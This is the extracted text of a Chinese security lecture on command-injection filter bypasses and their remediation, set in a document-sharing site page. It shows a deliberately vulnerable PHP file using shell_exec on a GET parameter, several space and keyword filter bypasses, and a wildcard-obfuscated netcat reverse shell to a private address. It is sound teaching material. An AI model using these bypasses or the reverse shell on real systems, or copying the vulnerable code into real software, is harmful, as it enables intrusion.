第31讲命令执行绕过与命令执行漏洞修复08课件.pptxVIP

第31讲命令执行绕过与命令执行漏洞修复08课件.pptx

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

第31讲命令执行绕过与命令执行漏洞修复任毅

引言开发人员在开发的过程中,为了避免命令执行漏洞,可能会过滤一些命令或者比较觉的攻击payload,攻击者会通过多种方式绕过过滤规则。

小测试有哪些绕过方法?

学习目标能描述命令执行绕过的方法能在Linux+DVWA平台完成命令执行漏洞绕过能提升命令执行漏洞维护能力

绕过空格过滤(1)${IFS}绕过$IFS是shell的特殊环境变量,在Linux下的内部域分隔符,IFS存储的值,可以是空格、tab、换行符或者其他自定义符号。

绕过空格过滤(2)%09绕过%09是Tab的URL编码,可以通过%09来代替空格,绕过空格的过滤。将以下代码保存为p1.php文件,放入Linux平台phpstudy的WWW目录下:?php$ip=$_GET[ip];$cmd=shell_exec(ping-c3.$ip);echo{$cmd};?

绕过空格过滤(3){}绕过空格过滤,可以用{}绕过,{cat,/etc/yum.conf}。

绕过空格过滤(4)、$IFS$9绕过空格可用$IFS$9绕过,如下:

绕过关键字过滤(1)变量拼接Linux支持变量赋值,可以通过变量拼接来绕过过滤规则,例:cat命令被过滤。

绕过关键字过滤(2)空变量绕过例如cat命令过滤。可以通过空变量绕过,ca${x}t

绕过关键字过滤(3)\绕过如果过滤了命令cat,可使用c\a\t绕过,如下:

绕过关键字过滤(4)系统变量绕过${SHELLOPTS}是系统自动变量,可以利用系统变量的字符拼接为命令来绕过过滤。

绕过关键字过滤(5)通配符绕过Linux支持通配符进行字符匹配,通配符的作用是用于模糊查询时通配文件名中某些不确定的字符。*代表任意字符(0到多个)?代表一个字符[]中间为字符组合,仅匹配其中任一一个字符

绕过关键字过滤(6)shell反弹绕过通过shell反弹进行攻击,但是存在过滤时,可以通过通配符来绕过进行命令执行。例如要执行以下命令:/bin/nc358888-e/bin/bash然后用通配符替换关键字,IP地址转换为10进制。192*256^3+168*256^2+91*256+135*1=3232258951/b??/?c32322589518888-e/???/b??h3232258951的16进制是0xC0A85B87?,也可以用/b??/?c0xC0A85B878888-e/???/b??h16进制的形式进行绕过。

绕过关键字过滤(7)base64编码绕过利用系统函数base64编码,将关键函数进行base64编码,绕过过滤。将id命令进行base64编码为aWQ=,然后利用base64-d进行解码,这样就绕过了过滤,并且正常执行了命令。

命令执行漏洞修复PHP配置文件禁用敏感函数通过php配置文件中的disable_functions禁用敏感函数。使用相关过滤函数处理相关参数escapeshellarg函数escapeshellarg—把字符串转码为可以在shell命令里使用的参数,过滤命令中的参数。escapeshellcmd函数escapeshellcmd—shell元字符转义,过滤命令。

测试1、有哪些命令执行绕过方法?2、有哪些过滤函数可用来防范命令执行漏洞?

小结1、命令执行绕过方法2、防范命令执行漏洞的函数:escapeshellarg、escapeshellcmd。

文档评论(0)

***** + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档